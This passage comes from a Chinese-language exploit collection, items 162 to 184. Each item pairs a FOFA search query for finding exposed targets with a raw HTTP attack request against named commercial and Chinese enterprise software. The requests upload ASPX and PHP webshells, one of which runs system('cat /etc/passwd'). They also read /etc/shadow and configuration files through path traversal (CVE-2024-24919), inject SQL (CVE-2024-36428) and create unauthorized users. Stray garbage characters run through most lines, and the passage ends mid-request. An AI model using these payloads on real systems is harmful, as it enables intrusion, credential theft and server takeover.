, `& R2 J& u9 ?9 JConnection: close
+ g: W5 X I: p, XContent-Length: 445
+ X" t# v& |9 N9 J' m3 m% JContent-Type: text/xml3 s1 u9 _" O- d( c V1 I; d
Accept-Encoding: gzip" D( t) I% l+ d/ p; u# x) S% M" V( G
9 E) e6 f0 Z" T7 m8 ^
<?xml version="1.0" encoding="utf-8"?>3 @. @+ X2 `- I2 B, Y: |$ j4 b. @: x
<soap:Envelope xmlns:xsi="/ j$ g7 T3 `0 E+ e
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
' K: M6 f* h; x9 }9 {- Xxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; N8 b/ Y) f' _<soap:Body>
/ \0 ?/ ]' m D2 X9 q<UploadResume xmlns="http://tempuri.org/">/ q) H/ M8 H( Y, _8 n g7 |& i
<ip>1</ip>* Q: B5 q* r3 X- h$ l; e; c. D
<fileName>../../../../dizxdell.aspx</fileName>9 L" S; r1 U7 e
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>8 Y7 W# l: e* e5 o7 `' b
<tag>3</tag>
3 z* d: j/ r/ ]& p</UploadResume>
9 p6 A' S9 u9 I! o</soap:Body>
, K+ t q O+ R, n</soap:Envelope>: I# r/ |5 f" Z" v( c/ Y! d
7 f+ `. H, W$ x t
* f2 }: d2 p, z. z$ _4 c5 }
http://x.x.x.x/dizxdell.aspx! `9 z' c7 R7 N. R% D& C
- G& ^ B3 s2 C$ \0 O162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传5 o0 Y) \. m. r; m% y
FOFA: app="和丰山海-数字标牌"
8 P" Y: b2 m/ p$ @; r S- zPOST /QH.aspx HTTP/1.13 |; X- a- R2 h# g- u Q
Host: x.x.x.x
$ A3 P, B7 @6 V% \/ q% @% k: b# f$ S% hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
3 e0 V$ M V# t0 RConnection: close6 u. ^; {) g3 N
Content-Length: 583
1 F1 j/ {9 W* l. J+ E7 L& A2 ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey2 n9 c5 _8 c n, |0 s2 e& v2 u
Accept-Encoding: gzip3 e; i% h, z6 {. j$ C
7 `& |% E& G' k
------WebKitFormBoundaryeegvclmyurlotuey
6 K* ]& ^, h# F4 {Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"& q& F- Y1 C+ m: _8 b
Content-Type: application/octet-stream
$ {2 D# V2 ]) F' B
. l. ~8 Z8 E2 S* a$ b A<% response.write("ujidwqfuuqjalgkvrpqy") %>! j) S3 Z% X9 ?. x) s
------WebKitFormBoundaryeegvclmyurlotuey
: X: j, M$ x' J$ R3 o4 rContent-Disposition: form-data; name="action"
) s" c9 f1 P9 ?0 y2 l2 G2 T+ W f* s) u6 Y% J% z( I
upload
2 O0 p |( `+ M9 K [7 i& I------WebKitFormBoundaryeegvclmyurlotuey; ?; y+ H1 u* }
Content-Disposition: form-data; name="responderId"
. g! Q! P$ a N' G k( u
1 E% ^; H' P. w" ~1 V6 U4 S) JResourceNewResponder1 X8 }; ?' l& e, |
------WebKitFormBoundaryeegvclmyurlotuey
# ^4 Z" D0 i3 p3 k6 fContent-Disposition: form-data; name="remotePath"0 I. q$ g% z3 ^2 n; Y- Z+ W0 U
0 y, U- S' m9 U6 \/opt/resources
2 H3 z- b" ]$ a! i------WebKitFormBoundaryeegvclmyurlotuey--
& \( w1 L4 r$ c1 T% Q* J( ^( q. F# @4 ~* ?0 W9 ~
# g' f I8 E9 V2 Chttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
* }' s: E7 m8 S6 A$ @; G' J- \. r
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传7 |! L# @5 I6 ^# ~& a% F
FOFA: icon_hash="-795291075", ^6 p* L" D" M
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1* r8 B6 ~/ y2 t. J5 w
Host: x.x.x.x
0 l+ A1 m9 V3 M1 e/ p# uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
! f- u! u; y2 D; D+ H, z. A0 \( b/ WConnection: close
1 D1 R; D: O" [& a% tContent-Length: 293
, x& O/ g" y4 K% A6 x. R! h2 EAccept: */*
! F/ C) U+ r7 P- y7 }- ^Accept-Encoding: gzip, deflate
9 O* s' z: C" RAccept-Language: zh-CN,zh;q=0.9# v* K1 {9 A8 I2 E8 ?; [
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod% m8 x3 v1 `. t/ r
8 Y$ t1 K# a4 F5 T------iiqvnofupvhdyrcoqyuujyetjvqgocod
+ C" H$ O! H* z DContent-Disposition: form-data; name="name"7 a% i( z1 M/ @; T3 i! G6 L& y' }* q
) V# g n, c* ^6 E% [* E! N) o8 S, j
1.php1 j4 L/ r0 N. X+ y! X
------iiqvnofupvhdyrcoqyuujyetjvqgocod& R% h$ h. k2 V+ u1 s
Content-Disposition: form-data; name="upfile"; filename="1.php"
. F: e. w1 M2 c. m! p8 XContent-Type: image/jpeg
# C1 _+ M# f/ ~+ D- O/ r8 u& u& ~
' ^" O. F% W* i0 C/ Y9 wrvjhvbhwwuooyiioxega' C4 r# m9 ]8 p0 u' |" [# Y
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
) I: ~& A3 D6 N7 l0 K5 c0 S( |6 B
. g5 w( ]+ c$ p* F# G" p164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传& F* d7 g) f. _; ^* T, b3 h
FOFA: title="智慧综合管理平台登入"3 e+ J+ [8 E! b8 s6 J' c" H
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
+ x1 z3 t: W$ bHost: x.x.x.x
/ v' O) r7 `0 `+ P v* V( q% R! }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
/ S( f+ L' \- c3 c0 ^7 k$ f iContent-Length: 2886 z4 f- N) D5 c' J8 T; ^
Accept: application/json, text/javascript, */*; q=0.01
6 P* b, O, H: `# vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,: H5 h( C! B% f
Connection: close
( L' K* C% ~, v4 W6 k' b0 L ~Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl9 f5 _& W. c' Y% \, C$ V
X-Requested-With: XMLHttpRequest, x) c8 w" K0 `1 K
Accept-Encoding: gzip
4 a' T) c+ g _
9 O4 d, p2 n5 d. j; u------dqdaieopnozbkapjacdbdthlvtlyl
! N7 A4 k, |0 RContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"7 I6 P7 E8 c1 [8 e8 ^4 \
Content-Type: image/jpeg1 o( V$ ]) _* q, w
4 m2 I3 C! p( |$ x" T. O
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>9 u4 u# T6 K/ {6 t# o M
------dqdaieopnozbkapjacdbdthlvtlyl--$ Z4 n! S+ Z n8 m/ j8 i' P# x
- h5 P( T: g/ O. R, R7 o
3 M2 U* L Z# K2 vhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx' v! A* u @3 a
4 A# S5 D( M& S
165. OrangeHRM 3.3.3 SQL 注入
( A6 z8 O5 l/ q. n$ S6 kCVE-2024-36428
- V+ ~: Z& [; ^( W9 N; n X$ ^! kFOFA: app="OrangeHRM-产品"
) G$ ]9 W) z" V& g& j- h' e3 S' \URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
2 k5 q) v/ S/ e8 u* _
1 t \, x: j5 R0 r! b% o6 q# P* t1 n) ^
166. 中成科信票务管理平台SeatMapHandler SQL注入, r- q' E2 [! Z1 ?) X! h6 H' z! z. q7 J
FOFA:body="技术支持:北京中成科信科技发展有限公司"
! G9 t7 g6 s OPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
. Y2 s `; W0 w& `5 H9 b6 @$ QHost:
- T$ j# k+ k ]Pragma: no-cache
8 J9 O; Y8 F2 X+ CCache-Control: no-cache
4 M7 w Z. v$ j. ^4 T# s5 ZUpgrade-Insecure-Requests: 1
$ u) t1 S' N% c# t: o( D. \3 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36) x2 z# S2 w: s/ [* X/ s+ L8 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 |0 ^+ Q9 {3 Y5 OAccept-Encoding: gzip, deflate9 F7 e+ c* x9 s( t6 ]
Accept-Language: zh-CN,zh;q=0.9,en;q=0.88 u ?5 A: L& e- U' j2 {0 m5 H
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE- L$ I. {+ v/ p
Connection: close1 s2 ?& D, N* K. b. z: G
Content-Type: application/x-www-form-urlencoded. W" E% |' _: J0 K+ o* {+ e$ d( t
Content-Length: 891 |) o x" N) s, z; v
+ O; s2 f# I1 a* s8 ^" NMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
$ t6 \9 I- p2 K0 T4 Q
# h J! k) N0 a- n0 {8 v
$ M, l& Z& W1 o3 b, W) h4 w8 p167. 精益价值管理系统 DownLoad.aspx任意文件读取
8 k: X% F3 e# @! q& F0 X/ rFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"" w% h) n) K; ~ y- z
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- F' E3 ~, ~0 p, O \3 r2 N6 p; [6 K
Host:% k* S- K; x5 F: E& x) A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, p# X. h; B; ?# Y9 \
Content-Type: application/x-www-form-urlencoded, I: E: k; Y4 B5 ]
Accept-Encoding: gzip, deflate# K0 b* i" I- J0 C) o
Accept: */*
6 N. J$ L& ?% J+ qConnection: keep-alive
$ P+ E, P# g9 M- n2 G1 e( s
+ K- B% A$ q) R: r# U9 i- J2 g/ p/ _* |3 b' C
168. 宏景EHR OutputCode 任意文件读取9 Q2 C2 J- Q5 V! U* b
FOFA:app="HJSOFT-HCM" z" ^/ t3 x) Q z9 z0 S' W* v
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
3 L( s2 K- E `3 u9 eHost: your-ip7 q: H" {7 ~; Y! n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, ]8 u$ z7 f# {( k4 Z
Content-Type: application/x-www-form-urlencoded- ^ L! a. ?# ~8 ^2 ^3 X
Connection: close
( R) I0 @1 {: g0 C- F
I3 @) Y& u, k' S1 _" n% ?6 L7 u7 p3 `$ S8 C5 ]
- F. x3 I- b: y3 i" Y' q; R" y! y169. 宏景EHR downlawbase SQL注入
4 h2 c# @: [# g) X6 t9 `FOFA:app="HJSOFT-HCM"
' c. f$ c0 `' c8 ? m0 ?& IGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1! s+ w _& o( o4 M
Host: your-ip
6 b* Z) G& K% y& T' hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; L+ {; y* V ~. a6 R2 k1 t: I& ~1 G
Accept: */*
& J8 s9 I( E% Q. J; HAccept-Encoding: gzip, deflate
+ b- S1 ]& Q M, r( R* JConnection: close/ i' Y6 B! W3 n9 n: K* e3 z+ @
& N" l" k% }+ ~" X6 U
) @- u/ N5 B j! Y, I, P0 V* I: Z; P, Z
170. 宏景EHR DisplayExcelCustomReport 任意文件读取- m3 n8 L! q7 W1 O
FOFA:body="/general/sys/hjaxmanage.js"7 n/ |( ^; X- P: V
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
4 L0 j8 A2 x3 y. N6 xHost: balalanengliang# ^ H- x9 Q! G
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ M6 L+ H" q7 P3 \0 e; d
Content-Type: application/x-www-form-urlencoded2 f$ v3 m" O5 H+ O# [
4 C9 ]8 V \' r1 K+ t' _- F
filename=../webapps/ROOT/WEB-INF/web.xml/ K: d" F; n9 `
7 `" i1 T2 D6 s d) }
3 b4 @4 e3 E5 U) J171. 通天星CMSV6车载定位监控平台 SQL注入
# p5 J. C9 X; ?FOFA:body="/808gps/"
& K+ _8 \% s' v! fGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
" I- {6 U% I% c$ a" Y+ z8 xHost: your-ip( n5 ]: L% I$ M. D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.07 E: r$ L7 Y: o
Accept: */*- n( O ^& \6 h1 b' ~: Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 P) d3 {, @% _5 N
Accept-Encoding: gzip, deflate3 ?" }. I6 ]- f
Connection: close
+ S" }1 J( V. C/ A
3 `; Z3 x; i+ g
1 S# A: `4 J6 L# z2 p
$ o0 Q7 M* j& w, ~172. DT-高清车牌识别摄像机任意文件读取
: H6 [4 ^2 ~/ e5 U: M0 NFOFA:app="DT-高清车牌识别摄像机" u/ ~" U4 k0 m9 |4 }
GET /../../../../etc/passwd HTTP/1.1
4 t. A j1 F& Q- v3 m: a) HHost: your-ip
$ J; i; e# O8 r. W' k: cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, u& q% q2 ^& E! }/ CAccept-Encoding: gzip, deflate# J) y6 d, [) h! j4 M4 e5 A$ Z
Accept: */*
4 ]$ s3 h+ }. ^( @. N% V0 w% {Connection: keep-alive; h4 |8 D, J7 w: j& g/ f8 C& Z
1 K, C' [; v. A+ o' |- B3 A- M' X2 i
2 W7 ~" t9 i% u0 M$ V, ~$ b
9 k: K/ ^- V5 k5 C% _" z
173. Check Point 安全网关任意文件读取
+ {) |1 E3 o( c5 D& W) qCVE-2024-24919
9 z8 t1 V. a7 |) i7 tFOFA:app="Check_Point-SSL-Network-Extender". C/ B; k" H: _& r
POST /clients/MyCRL HTTP/1.1
/ p+ {4 U8 N( K9 B; L7 P+ g$ QHost: your-ip
L- q/ O1 J: }/ FContent-Type: application/x-www-form-urlencoded2 ^5 t" @( K( m! Y. {, K
' K6 O5 O0 a( Y: H% |aCSHELL/../../../../../../../etc/shadow
; i% s |4 ?0 a5 | L4 @0 y
- R) _" \7 m6 V0 q4 w4 C2 v) x, i0 ^3 K
, M0 d H& a6 a$ g5 N) D. q# O) Z
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 m g8 @8 h/ D. nFOFA:app="金和网络-金和OA"" l6 @/ X5 [8 ?7 U
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
+ {; s/ q) |. g6 e5 @5 R" D/ T( {Host: your-ip
$ O" _% z6 [$ C! c+ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% X* g6 ]- G" i. T: R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 b, ~5 i3 o1 I5 ]
Accept-Encoding: gzip, deflate, br
% Q% U9 [ w4 l& z- y. XAccept-Language: zh-CN,zh;q=0.9% K2 {3 A2 a b5 F: F' b$ B e
Connection: close
7 F( h. Z- K. n& Q$ f! T% `3 k& Z/ i% a' v) @! A( @
$ n( `4 s+ G8 C8 n+ r+ c' K; z9 d" G' x
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入% Q5 j4 p4 \2 D2 c: Q# c K
FOFA:app="金和网络-金和OA"/ i/ Z# M+ F& r$ [ l
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.10 E6 c4 F+ X& D) e4 g6 G% p
Host:0 H# F! M) w: z" S
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 B# ~' I4 i. P5 w2 U8 j6 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* l6 y' C( y* v) l @6 b+ n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 a$ Z* E" d7 y$ [( i4 t0 M4 PAccept-Encoding: gzip, deflate
( v% M C# U" eConnection: close
/ c1 T9 _; `; @# v1 F% w# [* V7 ~Upgrade-Insecure-Requests: 1" \$ ?4 U" X/ _7 ^$ ? X: C
: t! M" V8 |0 s
/ m0 G! m$ E+ u176. 电信网关配置管理系统 rewrite.php 文件上传
$ B, G3 l [9 M4 O9 [FOFA:body="img/login_bg3.png" && body="系统登录"9 F1 ~ `8 }" _; |2 t
POST /manager/teletext/material/rewrite.php HTTP/1.1+ K, T- Q0 l m* ^" A% @ Y
Host: your-ip
( A7 I# N1 W& f2 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
: J+ K" K/ }8 }5 p1 RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT/ s+ x$ Y, P* V. ?% Q
Connection: close& c% U' I; G, b/ \ |
, [+ T1 W6 f$ p* Y# a6 _+ o
------WebKitFormBoundaryOKldnDPT
+ b- K8 k: V$ ~' ~5 ^Content-Disposition: form-data; name="tmp_name"; filename="test.php"
* L9 @5 M4 x z* J& QContent-Type: image/png5 R! b' H5 |+ K* d
- ^7 D9 a( M' q! `; r/ J<?php system("cat /etc/passwd");unlink(__FILE__);?>
2 g( A; s8 u3 Y' L------WebKitFormBoundaryOKldnDPT" r0 a: f' R9 U" Q& N j6 L
Content-Disposition: form-data; name="uploadtime"
, ]$ {! l t' `$ P! W3 W
( v) C# k/ [/ }9 ` 0 X2 {* g7 u) X9 s6 A# h
------WebKitFormBoundaryOKldnDPT--" n! n5 h8 F3 @7 [2 J
( T4 } F9 q, E
% L" \# N* {) d. s$ d/ H; e, z& q5 c2 }& e" X
177. H3C路由器敏感信息泄露
; X8 M+ e; d' O7 d7 }/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg, \" Y; N" A; n5 z+ g
/userLogin.asp/../actionpolicy_status/../M60.cfg4 b- W4 M C, `- s
/userLogin.asp/../actionpolicy_status/../GR8300.cfg+ o9 D; N" |1 v1 `" U3 t5 A
/userLogin.asp/../actionpolicy_status/../GR5200.cfg7 b @5 i5 a g3 F9 u
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
# G- ~: ]1 n6 u; G/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/ y8 U! M, [' F% L" C8 |+ z/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
( r& c9 v6 h) Z S& M2 l I/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
: g( s7 l! |4 F+ r5 Q. V/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
7 c( S w0 \. d) c) N+ N7 v/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg d, U* L$ q5 j0 C7 m
/userLogin.asp/../actionpolicy_status/../ER5200.cfg1 y# D, o5 W# k" u) B
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
, f& z: N8 V# k% x" M/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
. {* q( [. P4 r) o/userLogin.asp/../actionpolicy_status/../ER3260.cfg! ?$ ]' u7 j: y; }# E9 e
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg2 D: @9 D5 R; ~5 V
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
2 h9 D9 b9 _- ~/ \/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg$ Z; m) s. ?! X3 u% v
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
+ a6 e2 r( E- V: R! ^/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg4 Z$ p% L( f. o. u0 j5 ?# m# g& p
/userLogin.asp/../actionpolicy_status/../ER3100.cfg0 `2 a- k2 O' U! F
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
- a: e9 O+ U1 r3 w% R
5 o' O8 A& M0 k. n- U3 [ Y0 M0 y7 v p
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
h. \8 R3 G( q3 a' V0 s2 [; [) WFOFA:header="/selfservice": r3 _% W+ }* E) \9 u7 M. P% O
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1/ M: _( Z# Y# g p* O' R* b' Z
Host:, l% a1 \; V& ]" u. l7 S5 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 @. X4 _! }! P$ R4 t4 E' H
Content-Length: 252+ R7 ?: q$ `9 W3 V U
Accept-Encoding: gzip, deflate
4 N) }/ N7 Y _Connection: close4 }. ]* d' m1 X9 |6 }( l! R; B# f
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
/ o* G0 R+ @2 A: U) m/ d* B-----------------aqutkea7vvanpqy3rh2l" l9 \- j6 v x( P- N
Content-Disposition: form-data; name="12234.txt"; filename="12234"
e6 N. X! b' s$ NContent-Type: application/octet-stream. p) _5 W9 q) ]% S, ^
Content-Length: 255
) P/ \4 A p: a% t% O2 }) Z3 K
, R& Y% s# R) U7 g12234
) R+ R4 b' M; J7 J6 U-----------------aqutkea7vvanpqy3rh2l--3 b$ X6 D" W0 U `+ H/ b, b
& C( o" }7 Z$ ]8 O+ z+ A
. C. z0 J) `. H* o2 z, P
GET /imc/primepush/%2e%2e/flex/12234.txt- i1 o+ O F" f% A; W5 _
8 V" @' R( U4 k0 h5 t- Y+ M: l4 s) x2 z* y9 y
179. 建文工程管理系统存在任意文件读取( P/ q, f3 o. j' ^5 A& o
POST /Common/DownLoad2.aspx HTTP/1.1
% L" m2 o$ s* Y; c9 WHost: {{Hostname}}( _# b+ D, Y# l7 x8 S
Content-Type: application/x-www-form-urlencoded0 P8 M( m9 o2 l' H t6 x, E
User-Agent: Mozilla/5.0# r9 S" R+ v. G9 _8 O' d
% X0 p/ M* m Q) [+ b+ ? q6 [& j
path=../log4net.config&Name=9 S* y: e# s& K% `; Z0 r1 K
7 q* c( L9 x4 D" w' c5 C! V$ r; N9 Y! X& b" ?
180. 帮管客 CRM jiliyu SQL注入
! B4 u/ E2 O5 e& E2 mFOFA:app="帮管客-CRM"/ w0 l8 y; H* |' G% V* E
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1( [4 }) M; u$ ^ M$ P2 ^* O" K6 ^
Host: your-ip: [; T; Y& j9 k g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% x1 N" ]2 x5 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 |9 s$ W2 l% B% q# L0 [9 jAccept-Encoding: gzip, deflate& |- d; X4 E! v$ ~6 O% _
Accept-Language: zh-CN,zh;q=0.9
# L, e: C6 w, Y& sConnection: close# f6 b! e e6 {
S/ L1 T8 P) P' O) ^! q" v3 R
+ D z! Q& @/ g! K' K! f181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入 t4 E1 }1 z/ g% q. G, N
FOFA:"PDCA/js/_publicCom.js"
4 T3 B* O4 X# L4 T0 f2 ZPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
. @4 t$ j7 y7 R. R/ q" a, M" UHost: your-ip
& |* B: z8 q) ^( p1 J) j# _3 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36( t. P: D/ K; N# O1 r4 N7 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 A0 c7 l9 ^6 S S; e. eAccept-Encoding: gzip, deflate, br
8 E8 M, a0 [+ S5 P) x1 V6 v3 A. ]Accept-Language: zh-CN,zh;q=0.9
0 X) z& o$ ~7 O* ]' x4 g" T2 DConnection: close) }/ B* c% W" {( Y6 F+ V
Content-Type: application/x-www-form-urlencoded
, o4 v8 ^8 x# v% N% _* J* l( ?& n' }! t' W* r. y" z; L' D4 ~0 p
& {( D4 d3 k2 h
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=200 Y# _+ U4 j3 j% |: k+ E. ?4 c
* B- `: _" U& {" }& j
1 v1 R) I- n! O1 \4 t
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 f u' w* k2 j. P& B5 MFOFA:"PDCA/js/_publicCom.js"1 u9 k4 C3 w/ j4 c1 a! `
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
& B6 c9 G" I2 r: v2 j% u/ G6 I. i SHost: your-ip
2 s: L* M* K( ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 v8 H6 P0 j( _' rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 u0 a7 J- ]' v u' i3 W, ~
Accept-Encoding: gzip, deflate, br
2 d7 ~$ `0 Z# }Accept-Language: zh-CN,zh;q=0.9
) l' N" C0 i1 Z4 UConnection: close7 Z3 A/ F1 v# W/ @
Content-Type: application/x-www-form-urlencoded
! V1 Y) i8 U, y5 ^5 @3 i" R" z$ V+ d( M, j
7 o7 \6 E1 o# T: O4 B2 ]1 A. Q
username=test1234&pwd=test1234&savedays=10 I/ s" m, s8 C. a
/ \, l: j8 w3 |- g$ T8 h" |# j
% w4 Z( M8 [& M8 I- k+ Q1 }
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
0 [6 P' E; r% d/ }* ?/ I( BFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"* {: R7 e; C) U' H& v
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
( M2 f) \ a9 z1 y5 LHost: your-ip j3 b5 r" x% W
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 f2 K3 v! G' d) [# B6 oAccept-Charset: utf-8& V$ Y; f# @/ p/ s! o2 L1 M# `1 S0 {; V
Accept-Encoding: gzip, deflate* j% [% ?6 C4 g/ S
Connection: close0 i+ m: F. @$ |
* ?+ ^( D: x& p; n8 j
$ b6 f/ L! z {5 p184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
! {7 c4 }- U$ P( ?* ^ w* n: AFOFA:server="SunFull-Webs"
& I. Q1 `* ?, f2 X- [& G: qPOST /soap/AddUser HTTP/1.1
; l2 _9 Q# Q& I9 v$ a: P! HHost: your-ip
' v: Y+ G3 z/ [' [Accept-Encoding: gzip, deflate7 Q3 n U& \( B( S C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
$ t0 D, V! ~4 t& E$ `8 BAccept: application/xml, text/xml, */*; q=0.01" f8 H: O6 E9 ~7 V0 r9 [2 Z; R
Content-Type: text/xml; charset=utf-8
; e* D- e: G+ D- \0 q/ WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
a& [4 M1 R' p5 {& s6 b+ FX-Requested-With: XMLHttpRequest- Q* G/ g; F Q
* ?; C$ E# }$ Q1 E4 ?+ h% O
